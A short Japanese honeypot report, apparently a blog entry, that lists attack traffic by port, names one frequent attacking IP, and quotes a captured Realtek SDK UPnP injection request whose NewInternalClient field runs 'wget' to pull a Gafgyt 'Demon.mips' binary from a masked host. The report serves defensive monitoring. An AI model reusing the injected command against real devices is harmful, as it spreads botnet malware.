【ハニーポット簡易分析】Honeytrap簡易分析(150日目:1/5)
【ハニーポット簡易分析】Honeytrap簡易分析(150日目:1/5) です。
Honeytrap簡易分析(150日目:1/5)
※80ポートは対象外
<宛先ポート別検知数>
| 宛先ポート | 検知数 | サービス | ペイロード例 |
| 22 | 1443 | SSH | SSH-2.0-libssh2_1.7.0.. |
| 445 | 1035 | SMB | SMBrS@bPC NETWORK PROGRAM 1.0 |
| 8080 | 214 | PROXY | GET / HTTP/1.1 |
| 2022 | 175 | SSH | SSH-2.0-libssh2_1.7.0.. |
| 1433 | 158 | Microsoft SQL Server | S.E.R.V.E.R.s.a.O.S.Q.L |
| 52869 | 142 | Realtek SDK | POST /picsdesc.xml |
| 10022 | 64 | SSH | SSH-2.0-libssh2_1.7.0.. |
| 3389 | 64 | RDP | ...+&......Cookie: mstshash=hello.......... |
| 1962 | 63 | ? | ? |
| 81 | 42 | UPnP | GET /login.cgi |
SSHへの不正アクセスを試みる通信が大量に検知していました。なお、送信元IPを調査したところ、特定のIPからの通信gsほとんどであり、他でも攻撃元IPとして報告されていることを確認しました。
51.77.148.87 | OVH SAS | AbuseIPDB
<新規マルウェアダウンロード>
新規のマルウェアダウンロードはありませんでしたが、ポート443へ向けて Gafgyt 亜種のダウンロードを狙った攻撃を検知していました。
◾️検知内容
POST /picsdesc.xml HTTP/1.1
Host: xxx.xxx.xxx.xxx:443
〜省略〜
<NewInternalClient>`cd /tmp/;wget hxxp://xxx[.]xxx.xxx.xxx/Demon.mips -O Demon`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
以上となります。
